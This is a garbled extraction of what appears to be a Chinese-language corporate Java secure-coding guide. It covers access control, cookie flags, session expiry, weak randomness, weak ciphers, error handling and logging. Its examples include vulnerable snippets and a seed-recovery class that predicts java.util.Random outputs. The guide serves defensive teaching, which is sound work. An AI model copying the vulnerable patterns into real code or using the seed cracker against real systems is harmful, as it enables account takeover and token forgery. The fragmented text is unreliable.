userid=?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nn.execUpdate(sql,params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nn.closeConn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是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ques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参数列表中，获取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也就是表单提交上来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之后修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对应的用户数据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而表单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是可以让用户随意修改的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通常在修改数据时，变化数据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如果存在这个漏洞，就可以修改成功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代码，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libaba.c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的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通过一个浏览器插件，拦截提交的数据，并修改了这个数据，如下图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修改后，提交，即可修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ser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所对应的其他用户的数据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个例子是判断了所属人，但是却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可控数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，获取了所属人。还有一种形式是没有判断所属人，直接修改数据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从用户的加密认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，获取当前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并且需要在执行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中，加入当前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作为条件语句。由于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控制的加密算法，所以恶意用户无法修改加密信息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代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t userid=Integer.valueOf( GetUseridFromCookie(request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email=request.getParameter("email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tel=request.getParameter("tel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realname=request.getParameter("realname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tring pass=request.getParameter("pass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dbcConnection conn = null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ry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nn = new JdbcConnection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bject[] params = new Object[5]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0] = emai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1] = te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2] = realname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3] = pass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arams[4] = userid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inal String sql = "update user set email=?,tel=?,realname=?,pass=? where userid=?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nn.execUpdate(sql,params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nn.closeConn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中通过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GetUseridFrom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从加密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获取了当前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并加入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语句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HER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条件中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常见问题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并不是所有的语句都有这个漏洞，有些是定时任务，或后台管理员执行的，这些必须和开发人员一一确认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六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Sessi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管理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 httponly flag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 http onl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是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可以设置的一个属性，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没有设置这个属性，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值可以被页面脚本读取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攻击者发现一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漏洞时，通常会写一段页面脚本，窃取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为了增加攻击者的门槛，防止出现因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漏洞导致大面积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被盗，所以应该在设置认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增加这个属性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代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response.setHeader("SET-COOKIE", "user=" + request.getParameter("cookie"))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没有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 onl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属性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Cross Site Script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加入属性即可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sponse.setHeader("SET-COOKIE", "user=" + request.getParameter("cookie") + "; HttpOnly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图可以看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已经加入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onl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属性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常见问题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类中没有找到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onl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方法？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目前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dk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版本只支持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tHeader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onl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httponl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已经可以防止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被窃取，还需要做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防御吗？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只能增加攻击者的难度，不能达到完全防御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 Secure flag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名称定义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 Secur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是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可以设置的一个属性，设置了这个属性后，只有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访问时，浏览器才会发送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浏览器默认只要使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请求一个站点，就会发送明文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如果网络中有监控，可能被截获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网站全站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，可以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加上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cur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属性，这样浏览器就只会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访问时，发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即使窃听网络，也无法获取用户明文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代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sponse.setHeader("SET-COOKIE", "user=" + request.getParameter("cookie") + "; HttpOnly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没有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cur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属性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方法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进行网络监听，可以看到下图是没有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cur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属性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发送的数据包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设置认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，加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cur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sponse.setHeader("SET-COOKIE", "user=" + request.getParameter("cookie") + "; HttpOnly ; Secure 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再次访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网站，抓数据包可以看到，已经不再发送这个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了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lastRenderedPageBreak/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ssion Expires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ssion Expire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ssi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有效期安全攻击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ssi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没有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中设置强制超时时间，攻击者一旦曾经获取过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ssio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就可以一直使用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设置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代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sponse.setHeader("SET-COOKIE", "user=" + request.getParameter("cookie") + "; HttpOnly ; Secure "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没有在服务器中设置强制超时时间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利用网络监听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x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等一些手段获取用户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之后就可以一直使用用户身份登录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具体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Cross Site Script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或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Cookie Secure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的示例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设置认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，加入两个时间，一个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即使一直在活动，也要失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时间，一个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长时间不活动的失效时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并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中，首先判断两个时间是否已超时，再执行其他操作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示例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidRDefault="001807CD" w:rsidP="001807CD"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       //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判断会员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是否过期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 if (isLogin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 String timeStampStr = (String) map.get(UserAuthenticationContext.TIMESTAMP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 long loginTime = 0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 try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     loginTime = Long.parseLong(timeStampStr)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 } catch (NumberFormatException e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     if (logger.isInfoEnabled()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         logger.info(" loginId: " + usr.getLoginId() + " timestamp has exception " + timeStampStr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 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 long now = System.currentTimeMillis() / 1000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 if (now - loginTime &gt; UserAuthenticationContext.COOKIE_VALIDITY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     usr.setAuthenticated(false, true)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     if (logger.isInfoEnabled()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         logger.info("loginId: " + usr.getLoginId() + " loginTime: " + loginTime + " nowTime: " + now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     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        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七章密码算法安全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secure Pseudo randomness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secure Pseudo randomnes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伪随机性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由于计算机的本质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存储运算控制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因此它所采用的随机数算法实际上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伪随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。为了编写代码来实现类似随机的算法，常见情况下，伪随机数生成器生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0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N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之间的一个整数，返回的整数再除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N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得出的数字总是处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0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1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之间。对生成器随后的调用采用第一次运行产生的整数，并将它传给一个函数，以生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0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N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之间的一个新整数，然后再将新整数除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N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返回。这意味着，由任何伪随机数生成器返回的数目会受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0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N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之间整数数目的限制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伪随机数生成器将作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种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数当作初始整数传给函数。这粒种子会使这个球（生成伪随机数）一直滚下去。伪随机数生成器的结果仅仅是不可预测。由伪随机数生成器返回的每一个值完全由它返回的前一个值所决定（最终，该种子决定了一切）。如果知道用于计算任何一个值的那个整数，那么就可以算出从这个生成器返回的下一个值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也就是伪随机数攻击的本质，即穷举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随机种子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（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R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）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该漏洞可能导致依赖随机数的应用（例如依靠随机数生成的图法签名）可能会被人破解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下面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adom(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函数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实现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public Random(long seed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 this.seed = new AtomicLong(0L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 setSeed(seed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public int nextInt(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eturn next(32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protected int next(int bits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 long oldseed, nextseed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 AtomicLong seed = this.seed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 do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oldseed = seed.get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nextseed = (oldseed * multiplier + addend) &amp; mask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 } while (!seed.compareAndSet(oldseed, nextseed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  return (int)(nextseed &gt;&gt;&gt; (48 - bits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这段代码依靠确定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e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种子来运算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extseed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值，尽管使用了各种运算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但结果仍然是线性可预测的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参考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996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etscape1.1.40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S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加密种子被攻破的实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www.cs.berkeley.edu/~daw/papers/ddj-netscape.html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由于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Java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andom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种子的伪随机特点，因此可以通过前两次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andom.nextInt(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结果来猜测下一个随机数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ublic class RandomCracker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rotected static final long a=0x5deece66d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rotected static final long b=0xb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rotected static final long m=(1L&lt;&lt;48)-1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/**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*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* @param xint0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一次调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extInt(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获取的随机整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* @param xint1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二次调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nextInt(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获取的随机整数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* @output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下一次的随机数值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*/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ublic static void crack(int xint0,int xint1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long i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long seed=-1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long x0=(xint0&amp;0xFFFFFFFFL)&lt;&lt;16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long x1=(xint1&amp;0xFFFFFFFFL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or(i=0;i&lt;0xFFFFL;i++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seed=(((x0+i)*a)+b)&amp;m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if ((seed&gt;&gt;&gt;16)==x1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break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ed=-1L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f (seed==-1L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throw new RuntimeException("Input Error!");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lse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ystem.out.println("The Cracked x2="+(int)(((seed*a)+b&amp;m)&gt;&gt;&gt;16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，推荐采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cureRandom(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函数代替伪随机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andom(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函数。该算法提供了强随机的种子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(SHA1PRNG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使用随机算法时，尽量将随机数种子复杂化，例如在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erverTim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作为随机种子时，在其后面加一个固定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offside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整数值，这样可以有效避免被猜到随机种子的来源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sufficient Encryption Strength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nsufficient Encryption Strengt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弱加密强度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项目中设计到敏感信息的数据采用程序员自己编写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简单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加密，一旦被人获取足够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样本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将有可能被反向推测出解密算法，从而泄露重要信息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一些低强度的密码算法，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DE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C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等已经可以很容易的在短时间内被人所破解，其它一些容易被误用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密码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base64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scap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urlencod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等，其实并不是密码算法，只是简单的编码而已，不能起到密码算法保护信息的作用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线性加密算法，下面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古典密码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为例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•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ublic class Caesar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ublic static void encode(String PlainText, int Offset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String CipherText = "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for (int i = 0; i &lt; PlainText.length(); i++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if (PlainText.charAt(i) == 32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CipherText += (char)(32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else if (PlainText.charAt(i) &gt;= 'a' &amp;&amp; PlainText.charAt(i) &lt;= 'z')   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CipherText += (char)('a' + ((PlainText.charAt(i) - 'a' + Offset) % 26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else if (PlainText.charAt(i) &gt;= 'A' &amp;&amp; PlainText.charAt(i) &lt;= 'Z'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CipherText += (char)('A' + ((PlainText.charAt(i) - 'A' + Offset) % 26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else if (PlainText.charAt(i) &gt;= '0' &amp;&amp; PlainText.charAt(i) &lt;= '9'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CipherText += (char)('0' + ((PlainText.charAt(i) - '0' + Offset) % 10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System.out.println("Ciphertext: " + CipherText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oxMai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企业地址簿口令使用弱加密算法等漏洞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破解方法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第一种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基于明文密文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破解，由于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古典加密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同一字符每次都是映射到另一字符，因此，只要获取到一定数量的明文和加密后的密文，就可以清楚的还原出每个字符的映射关系。并且可以通过映射关系，可以写出解密程序，如下所示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第二种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只基于密文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的破解，在一定量的日常报文中，每个字母出现的频率是基本一致的，并且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“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古典加密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”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同一字符每次都是映射到另一字符，因此可以根据密文中每个字母出现的频率猜测出映射关系。并且可以通过映射关系，可以写出解密程序，如下所示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public static void decode(String CipherText, int Offset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String PlainText = ""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for (int i = 0; i &lt; CipherText.length(); i++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if (CipherText.charAt(i) == 32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PlainText += (char)(32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else if (CipherText.charAt(i) &gt;= 'a' &amp;&amp; CipherText.charAt(i) &lt;= 'z'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if((CipherText.charAt(i) - Offset) &lt; 'a'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PlainText += (char)('z' - ('a' - (CipherText.charAt(i) - Offset)) + 1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}else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 PlainText += (char)('a' + ((CipherText.charAt(i) - 'a' - Offset) % 26))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  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else if (CipherText.charAt(i) &gt;= 'A' &amp;&amp; CipherText.charAt(i) &lt;= 'Z'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if((CipherText.charAt(i) - Offset) &lt; 'A'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PlainText += (char)('Z' - ('A' - (CipherText.charAt(i) - Offset)) + 1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}else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 PlainText += (char)('A' + ((CipherText.charAt(i) - 'A' - Offset) % 26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 }  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else if (CipherText.charAt(i) &gt;= '0' &amp;&amp; CipherText.charAt(i) &lt;= '9')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if((CipherText.charAt(i) - Offset) &lt; '0'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PlainText += (char)('9' - ('0' - (CipherText.charAt(i) - Offset)) + 1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}else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  PlainText += (char)('0' + ((CipherText.charAt(i) - '0' - Offset) % 10))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System.out.println("PlainText: " + PlainText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禁止使用自己编写的密码算法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不要将编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(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Base64)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和密码算法混为一谈，前者不是密码算法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不要使用低强度的密码算法，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DE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RC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等，必须采用符合业内安全强度标准的密码算法，见下表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目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保密性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认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不可抵赖性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保密性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认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不可抵赖性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保密性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认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不可抵赖性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完整性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完整性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来源认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算法强度（按对称密钥长度和算法安全期限）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对称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DS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电子签名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RSA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ECC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摘要算法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HMAC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信息验证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强度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80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位；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时间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010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2TDES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3TDES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ES-1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ES-19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AES-256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最小长度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公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= 1024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私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=160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最小长度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密钥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=1024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最小长度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密钥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=160 SHA-1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224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256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384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512 SHA-1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SHA-224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256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384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51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强度为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1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位；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时间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030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3TDES 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广东传世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ES-12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AES-19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AES-256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最小长度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公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= 204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私钥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= 224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最小长度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密钥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=2048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最小长度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密钥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=224 SHA-224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256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384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512 SHA-1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224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256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384,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HA-512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：参考文档：《证书及密钥安全标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v6DC-0216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》，刘坤，阿里云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-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集团信息安全中心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八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错误处理与日志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rror Handling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安全威胁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rror Handl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错误处理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程序出错时，会返回一些程序异常信息，从而暴露很多对攻击者有用的信息，攻击者可以利用这些错误信息，制定下一步攻击方案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代码示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下代码是做数据库查询的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try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PreparedStatement pst = conn.prepareStatement(sql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ResultSet rs  = pst.executeQuery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while(rs.next())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User u = new User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u.setId(rs.getLong("id"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u.setName(rs.getString("name"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u.setPass(rs.getString("pass"));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u.setType(rs.getInt("type")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 userlist.add(u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System.out.println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if(rs != null) rs.clos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lastRenderedPageBreak/>
        <w:t>   if(pst  != null) pst.clos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if(conn != null) conn.clos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} catch (SQLException e) {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// TODO Auto-generated catch block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e.printStackTrace();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}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直接抛出了错误异常，没有经过任何处理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实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进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入攻击时，攻击者提交可以让程序出错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ge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请求，导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展现了错误页面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看到这个信息，攻击者可以做以下判断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1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数据库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oracle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2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、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查询语句的列数不正确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根据这个判断，攻击者调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ge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请求的内容，最终达到获取数据库所有数据的目的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解决方案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配置错误页面，让所有的错误都只显示友好信息，不显示任何与实际错误相关的信息。例如以下页面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Logging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记录日志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在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应用运行的过程中，必须开启安全日志。当疑似攻击发生时，对用户的当前请求，记录日志。在所有安全方案中需要记录日志的地方，都应该按照本章节的要求记录日志，以便回溯攻击场景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日志存储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日志文件要单独放在服务器上，不能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web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容器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lo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放在同一个文件中，并且是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无法直接访问到的地方，例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 /home/admin/tomcat/logs/security(date).log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日志存储要预留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接口，以便需要时将日志通过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，发送到统一的服务器上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日志字段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字段按照以下要求记录，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 reques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包可配置，平时可以不打开，当受到攻击频繁时，临时开启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字段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 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说明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IP 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访问者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P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地址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id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用户已登录，可以记录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用户名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如果用户已登录，可以记录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cookie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当前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 reques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的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ookie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method     POST/GET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 reques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数据包内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可配置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动作描述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可能发生的攻击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分类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可能发生的攻击类型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威胁级别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根据漏洞类型定义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者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/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受攻击者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本次事件是攻击者的请求，还是被攻击者的请求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时间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 xml:space="preserve">      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攻击发生的时间，要以服务器时间为准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品牌营销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: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网站建设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策划营销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运营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lastRenderedPageBreak/>
        <w:t>推广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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>电商服务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九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hangelog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添加密码安全章节，添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error handing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，添加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flash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 --  2010-7-7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周拓修正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ross Site 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章节错误，李昊、刘坤校对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     --  2010-8-20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第十章相关链接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中文站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CSRF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方案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security.alibaba-inc.com/twiki/bin/view/Security/SecuritySolution/%E4%B8%AD%E6%96%87%E7%AB%99CSRF%E6%96%B9%E6%A1%8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Ibatis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防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SQL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注射方案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security.alibaba-inc.com/twiki/bin/view/Security/SecuritySolution/Ibatis%E9%98%B2SQL%E6%B3%A8%E5%B0%84%E6%96%B9%E6%A1%88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JavaScript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编码安全规范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security.alibaba-inc.com/twiki/bin/view/Security/SecuritySolution/JavaScript%e7%bc%96%e7%a0%81%e5%ae%89%e5%85%a8%e8%a7%84%e8%8c%83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Velocity</w:t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跨站修补方案：</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://security.alibaba-inc.com/twiki/bin/view/Security/SecuritySolution/Velocity%E8%B7%A8%E7%AB%99%E4%BF%AE%</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidSect="00B07B2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3A" w:rsidRDefault="00107A3A" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00107A3A" w:rsidRDefault="00107A3A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1807CD">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>37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1807CD">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>38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3A" w:rsidRDefault="00107A3A" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00107A3A" w:rsidRDefault="00107A3A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07A3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107A3A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07A3A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DE7"/>
    <w:rsid w:val="00026BCE"/>
    <w:rsid w:val="00044C81"/>
    <w:rsid w:val="00067A2E"/>
    <w:rsid w:val="000A2612"/>
    <w:rsid w:val="000A57EB"/>
    <w:rsid w:val="000D26B6"/>
    <w:rsid w:val="00107A3A"/>
    <w:rsid w:val="001256E1"/>
    <w:rsid w:val="00132A14"/>
    <w:rsid w:val="001807CD"/>
    <w:rsid w:val="001A657E"/>
    <w:rsid w:val="002176D3"/>
    <w:rsid w:val="00225B8A"/>
    <w:rsid w:val="002A2E7C"/>
    <w:rsid w:val="002C5BA6"/>
    <w:rsid w:val="002D068E"/>
    <w:rsid w:val="00325BC1"/>
    <w:rsid w:val="0038317E"/>
    <w:rsid w:val="003B7DE7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E5455CF5-EB30-49FC-A3D1-65D21E3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8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04DE6-C277-44B1-A654-0ECF85F8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5508</Words>
  <Characters>31402</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>261</Lines>
  <Paragraphs>73</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-11T07:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-11T07:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>